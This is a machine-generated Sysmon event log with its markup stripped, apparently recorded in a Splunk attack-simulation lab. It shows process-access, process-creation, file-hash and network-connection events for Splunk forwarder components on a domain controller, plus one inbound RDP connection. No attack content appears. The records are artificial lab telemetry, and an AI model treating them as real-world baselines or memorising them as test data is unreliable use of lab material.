l+51781 10341000x80000000000000001051475Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:57:51.880{466BC892-02AF-60E8-0C00-00000000CF01}8448956C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001051474Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:57:51.880{466BC892-02AF-60E8-0C00-00000000CF01}8448956C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001051473Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:57:51.880{466BC892-02AF-60E8-0C00-00000000CF01}8448956C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001051472Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:57:51.880{466BC892-02AD-60E8-0500-00000000CF01}408476C:\Windows\system32\csrss.exe{466BC892-F5FF-60EB-8D7D-00000000CF01}1328C:\Program 
Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x80000000000000001051471Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:57:51.880{466BC892-02BC-60E8-2A00-00000000CF01}29283252C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{466BC892-F5FF-60EB-8D7D-00000000CF01}1328C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x80000000000000001051470Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:57:51.881{466BC892-F5FF-60EB-8D7D-00000000CF01}1328C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" --ps2C:\Windows\system32\NT 
AUTHORITY\SYSTEM{466BC892-02AD-60E8-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{466BC892-02BC-60E8-2A00-00000000CF01}2928C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x80000000000000001051469Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:57:51.466{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F9D5F293EA9EF432271BAAD6EC6692C6,SHA256=1B03763A4CD8D1C88A88DDAD542140C63D217917045F78B7384A6BFE681CB09F,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000808584Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:57:51.227{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=49988779A7D436616A690565F02DE822,SHA256=DF507F8859151ADD88E960472EDEB519DA7760EFF42CA8F630071B7C9197F0BA,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001051468Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:57:43.664{466BC892-02C7-60E8-6D00-00000000CF01}3524C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-890.attackrange.local51103-false10.0.1.12-8000- 354300x80000000000000001051467Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:57:43.116{466BC892-02AF-60E8-0F00-00000000CF01}360C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK 
SERVICEtcpfalsefalse191.96.168.180-61418-false10.0.1.14win-dc-890.attackrange.local3389ms-wbt-server 10341000x80000000000000001051466Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:57:51.133{466BC892-02BD-60E8-3500-00000000CF01}32483268C:\Windows\system32\conhost.exe{466BC892-F5FE-60EB-8C7D-00000000CF01}9800C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001051465Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:57:51.131{466BC892-02AF-60E8-0C00-00000000CF01}8448956C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001051464Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:57:51.131{466BC892-02AF-60E8-0C00-00000000CF01}8448956C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001051463Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:57:51.131{466BC892-02AF-60E8-0C00-00000000CF01}8448956C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001051462Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:57:51.131{466BC892-02AF-60E8-0C00-00000000CF01}8448956C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001051461Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:57:51.130{466BC892-02AD-60E8-0500-00000000CF01}408524C:\Windows\system32\csrss.exe{466BC892-F5FE-60EB-8C7D-00000000CF01}9800C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x80000000000000001051460Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:57:51.130{466BC892-02BC-60E8-2A00-00000000CF01}29283252C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{466BC892-F5FE-60EB-8C7D-00000000CF01}9800C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program 
Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x80000000000000001051459Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:57:50.964{466BC892-F5FE-60EB-8C7D-00000000CF01}9800C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe8.0.2Network monitorSplunk ApplicationSplunk Inc.splunk-netmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{466BC892-02AD-60E8-E703-000000000000}0x3e70SystemMD5=8746B8C1724B67C2B1261446C0CFAA57,SHA256=7EFD09FD383FAA75C5D2990E6DBBFD846AEAA08B7037C7D66B4A0EF2AE0866B3,IMPHASH=7B985F47B35272AD7B5218255ACE7AEC{466BC892-02BC-60E8-2A00-00000000CF01}2928C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x80000000000000001051458Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:57:51.081{466BC892-F5FE-60EB-8B7D-00000000CF01}100927452C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{466BC892-02BC-60E8-2A00-00000000CF01}2928C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program 
Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001051488Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:57:52.995{466BC892-02BD-60E8-3500-00000000CF01}32483268C:\Windows\system32\conhost.exe{466BC892-F600-60EB-8E7D-00000000CF01}8960C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001051487Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:57:52.993{466BC892-02AF-60E8-0C00-00000000CF01}8448956C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001051486Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:57:52.993{466BC892-02AF-60E8-0C00-00000000CF01}8448956C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001051485Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:57:52.992{466BC892-02AF-60E8-0C00-00000000CF01}8448956C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001051484Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:57:52.992{466BC892-02AF-60E8-0C00-00000000CF01}8448956C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001051483Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:57:52.992{466BC892-02AD-60E8-0500-00000000CF01}408476C:\Windows\system32\csrss.exe{466BC892-F600-60EB-8E7D-00000000CF01}8960C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x80000000000000001051482Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:57:52.992{466BC892-02BC-60E8-2A00-00000000CF01}29283252C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{466BC892-F600-60EB-8E7D-00000000CF01}8960C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program 
Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x80000000000000001051481Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:57:52.597{466BC892-F600-60EB-8E7D-00000000CF01}8960C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe8.0.2Active Directory monitorsplunk ApplicationSplunk Inc.splunk-admon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{466BC892-02AD-60E8-E703-000000000000}0x3e70SystemMD5=947139F3BB2AB70CAF692A60C7A3A735,SHA256=940554A0170A70F634689CC84B00C51AC0BCF773C9639E1305E3672441FC85C8,IMPHASH=357CEC18833E7FF2ABFB722902B13165{466BC892-02BC-60E8-2A00-00000000CF01}2928C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x80000000000000001051480Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:57:52.480{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=65019F1741F5441EC3E7B4F2C050BF87,SHA256=7E43C4BD507D3B5C45C4CB9E5D20D3ECAA538EAF73DC765F512A68C96AD1C38A,IMPHASH=00000000000000000000000000000000falsetrue 
23542300x8000000000000000808585Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:57:52.261{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=A56698F946E07EFF495A00AB2384B778,SHA256=BA386C2289EDFB4ACE4E533D8544DEAA1CCF28D462FA41AD166F2DB6BAE362F6,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001051479Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:57:52.080{466BC892-F5FF-60EB-8D7D-00000000CF01}132810176C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{466BC892-02BC-60E8-2A00-00000000CF01}2928C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001051499Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:57:53.742{466BC892-02BD-60E8-3500-00000000CF01}32483268C:\Windows\system32\conhost.exe{466BC892-F601-60EB-8F7D-00000000CF01}7868C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001051498Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
